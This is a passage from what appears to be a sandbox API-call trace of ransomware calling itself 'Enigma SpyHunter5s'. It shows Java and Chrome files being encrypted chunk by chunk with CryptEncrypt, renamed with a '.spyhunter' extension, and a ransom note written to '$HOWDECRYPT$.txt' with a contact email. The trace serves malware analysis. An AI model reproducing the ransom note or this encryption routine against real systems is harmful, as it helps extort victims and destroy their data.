hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0175.324] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.324] WriteFile (in: hFile=0x9c, lpBuffer=0x270e4c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e484, lpOverlapped=0x0 | out: lpBuffer=0x270e4c4*, lpNumberOfBytesWritten=0x270e484*=0x4, lpOverlapped=0x0) returned 1 [0175.359] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e484, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e484*=0x30, lpOverlapped=0x0) returned 1 [0175.359] CloseHandle (hObject=0x9c) returned 1 [0175.359] GetProcessHeap () returned 0x2c0000 [0175.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.359] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\hprof.dll.spyhunter") returned 60 [0175.359] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\hprof.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\hprof.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\hprof.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\hprof.dll.spyhunter")) returned 1 [0175.360] GetProcessHeap () returned 0x2c0000 [0175.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.360] GetProcessHeap () returned 0x2c0000 [0175.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0175.360] GetProcessHeap () returned 0x2c0000 [0175.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20860 | out: hHeap=0x2c0000) returned 1 [0175.360] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e4c0 | out: pbBuffer=0x270e4c0) returned 1 [0175.360] GetProcessHeap () returned 0x2c0000 [0175.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0175.361] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e4b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e4b8*=0x30) returned 1 [0175.361] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\fxplugins.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\fxplugins.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0175.388] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\fxplugins.dll") returned 54 [0175.388] StrStrW (lpFirst="fxplugins.dll", lpSrch=".txt") returned 0x0 [0175.388] GetProcessHeap () returned 0x2c0000 [0175.388] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0175.388] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e47c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e47c*=0x2800, lpOverlapped=0x0) returned 1 [0175.433] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.433] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e47c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e47c*=0x2800, lpOverlapped=0x0) returned 1 [0175.433] GetProcessHeap () returned 0x2c0000 [0175.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0175.433] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.433] WriteFile (in: hFile=0x9c, lpBuffer=0x270e4bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e47c, lpOverlapped=0x0 | out: lpBuffer=0x270e4bc*, lpNumberOfBytesWritten=0x270e47c*=0x4, lpOverlapped=0x0) returned 1 [0175.434] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e47c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e47c*=0x30, lpOverlapped=0x0) returned 1 [0175.434] CloseHandle (hObject=0x9c) returned 1 [0175.434] GetProcessHeap () returned 0x2c0000 [0175.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.434] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\fxplugins.dll.spyhunter") returned 64 [0175.435] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\fxplugins.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\fxplugins.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\fxplugins.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\fxplugins.dll.spyhunter")) returned 1 [0175.436] GetProcessHeap () returned 0x2c0000 [0175.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.436] GetProcessHeap () returned 0x2c0000 [0175.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0175.436] GetProcessHeap () returned 0x2c0000 [0175.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed1f50 | out: hHeap=0x2c0000) returned 1 [0175.436] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e4c0 | out: pbBuffer=0x270e4c0) returned 1 [0175.436] GetProcessHeap () returned 0x2c0000 [0175.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0175.436] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e4b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e4b8*=0x30) returned 1 [0175.436] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin\\deployJava1.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dtplugin\\deployjava1.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0175.437] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin\\deployJava1.dll") returned 65 [0175.437] StrStrW (lpFirst="deployJava1.dll", lpSrch=".txt") returned 0x0 [0175.437] GetProcessHeap () returned 0x2c0000 [0175.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0175.437] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e47c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e47c*=0x2800, lpOverlapped=0x0) returned 1 [0175.517] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.517] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e47c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e47c*=0x2800, lpOverlapped=0x0) returned 1 [0175.517] GetProcessHeap () returned 0x2c0000 [0175.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0175.517] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.517] WriteFile (in: hFile=0x9c, lpBuffer=0x270e4bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e47c, lpOverlapped=0x0 | out: lpBuffer=0x270e4bc*, lpNumberOfBytesWritten=0x270e47c*=0x4, lpOverlapped=0x0) returned 1 [0175.518] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e47c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e47c*=0x30, lpOverlapped=0x0) returned 1 [0175.518] CloseHandle (hObject=0x9c) returned 1 [0175.546] GetProcessHeap () returned 0x2c0000 [0175.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.547] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin\\deployJava1.dll.spyhunter") returned 75 [0175.547] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin\\deployJava1.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dtplugin\\deployjava1.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\dtplugin\\deployJava1.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\dtplugin\\deployjava1.dll.spyhunter")) returned 1 [0175.548] GetProcessHeap () returned 0x2c0000 [0175.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.548] GetProcessHeap () returned 0x2c0000 [0175.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0175.548] GetProcessHeap () returned 0x2c0000 [0175.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e034d8 | out: hHeap=0x2c0000) returned 1 [0175.548] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e4b8 | out: pbBuffer=0x270e4b8) returned 1 [0175.548] GetProcessHeap () returned 0x2c0000 [0175.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0175.548] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e4b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e4b0*=0x30) returned 1 [0175.548] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\client\\classes.jsa" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\client\\classes.jsa"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.548] GetProcessHeap () returned 0x2c0000 [0175.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0175.549] GetProcessHeap () returned 0x2c0000 [0175.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f400 | out: hHeap=0x2c0000) returned 1 [0175.549] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e4b8 | out: pbBuffer=0x270e4b8) returned 1 [0175.549] GetProcessHeap () returned 0x2c0000 [0175.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0175.549] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e4b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e4b0*=0x30) returned 1 [0175.549] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\axbridge.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\axbridge.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0175.550] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\axbridge.dll") returned 53 [0175.550] StrStrW (lpFirst="axbridge.dll", lpSrch=".txt") returned 0x0 [0175.550] GetProcessHeap () returned 0x2c0000 [0175.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0175.550] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e474, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e474*=0x2800, lpOverlapped=0x0) returned 1 [0175.625] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.625] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e474, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e474*=0x2800, lpOverlapped=0x0) returned 1 [0175.625] GetProcessHeap () returned 0x2c0000 [0175.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0175.625] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.625] WriteFile (in: hFile=0x9c, lpBuffer=0x270e4b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e474, lpOverlapped=0x0 | out: lpBuffer=0x270e4b4*, lpNumberOfBytesWritten=0x270e474*=0x4, lpOverlapped=0x0) returned 1 [0175.697] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e474, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e474*=0x30, lpOverlapped=0x0) returned 1 [0175.697] CloseHandle (hObject=0x9c) returned 1 [0175.697] GetProcessHeap () returned 0x2c0000 [0175.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.697] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\axbridge.dll.spyhunter") returned 63 [0175.697] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\axbridge.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\axbridge.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\axbridge.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\axbridge.dll.spyhunter")) returned 1 [0175.699] GetProcessHeap () returned 0x2c0000 [0175.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.699] GetProcessHeap () returned 0x2c0000 [0175.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0175.699] GetProcessHeap () returned 0x2c0000 [0175.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ba98 | out: hHeap=0x2c0000) returned 1 [0175.699] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0175.701] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0175.701] WriteFile (in: hFile=0x9c, lpBuffer=0x270e3e7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e510, lpOverlapped=0x0 | out: lpBuffer=0x270e3e7*, lpNumberOfBytesWritten=0x270e510*=0x127, lpOverlapped=0x0) returned 1 [0175.702] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0175.702] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e510, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e510*=0x2ac, lpOverlapped=0x0) returned 1 [0175.702] CloseHandle (hObject=0x9c) returned 1 [0175.702] GetProcessHeap () returned 0x2c0000 [0175.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5e6c0 | out: hHeap=0x2c0000) returned 1 [0175.703] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e4b0 | out: pbBuffer=0x270e4b0) returned 1 [0175.703] GetProcessHeap () returned 0x2c0000 [0175.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0175.703] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e4a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e4a8*=0x30) returned 1 [0175.703] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\zh-TW.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\zh-tw.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0175.704] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\zh-TW.pak") returned 84 [0175.704] StrStrW (lpFirst="zh-TW.pak", lpSrch=".txt") returned 0x0 [0175.704] GetProcessHeap () returned 0x2c0000 [0175.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0175.704] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e46c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e46c*=0x2800, lpOverlapped=0x0) returned 1 [0175.731] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.731] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e46c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e46c*=0x2800, lpOverlapped=0x0) returned 1 [0175.731] GetProcessHeap () returned 0x2c0000 [0175.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0175.731] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.731] WriteFile (in: hFile=0x9c, lpBuffer=0x270e4ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e46c, lpOverlapped=0x0 | out: lpBuffer=0x270e4ac*, lpNumberOfBytesWritten=0x270e46c*=0x4, lpOverlapped=0x0) returned 1 [0175.745] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e46c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e46c*=0x30, lpOverlapped=0x0) returned 1 [0175.745] CloseHandle (hObject=0x9c) returned 1 [0175.752] GetProcessHeap () returned 0x2c0000 [0175.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.752] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\zh-TW.pak.spyhunter") returned 94 [0175.752] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\zh-TW.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\zh-tw.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\zh-TW.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\zh-tw.pak.spyhunter")) returned 1 [0175.753] GetProcessHeap () returned 0x2c0000 [0175.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.753] GetProcessHeap () returned 0x2c0000 [0175.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0175.753] GetProcessHeap () returned 0x2c0000 [0175.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eca790 | out: hHeap=0x2c0000) returned 1 [0175.754] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e4a8 | out: pbBuffer=0x270e4a8) returned 1 [0175.754] GetProcessHeap () returned 0x2c0000 [0175.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0175.754] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e4a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e4a0*=0x30) returned 1 [0175.754] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\th.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\th.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0175.756] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\th.pak") returned 81 [0175.756] StrStrW (lpFirst="th.pak", lpSrch=".txt") returned 0x0 [0175.756] GetProcessHeap () returned 0x2c0000 [0175.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0175.756] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e464, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e464*=0x2800, lpOverlapped=0x0) returned 1 [0175.787] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.787] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e464, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e464*=0x2800, lpOverlapped=0x0) returned 1 [0175.787] GetProcessHeap () returned 0x2c0000 [0175.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0175.787] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.787] WriteFile (in: hFile=0x9c, lpBuffer=0x270e4a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e464, lpOverlapped=0x0 | out: lpBuffer=0x270e4a4*, lpNumberOfBytesWritten=0x270e464*=0x4, lpOverlapped=0x0) returned 1 [0175.796] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e464, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e464*=0x30, lpOverlapped=0x0) returned 1 [0175.796] CloseHandle (hObject=0x9c) returned 1 [0175.805] GetProcessHeap () returned 0x2c0000 [0175.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.805] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\th.pak.spyhunter") returned 91 [0175.805] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\th.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\th.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\th.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\th.pak.spyhunter")) returned 1 [0175.805] GetProcessHeap () returned 0x2c0000 [0175.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.805] GetProcessHeap () returned 0x2c0000 [0175.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0175.806] GetProcessHeap () returned 0x2c0000 [0175.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 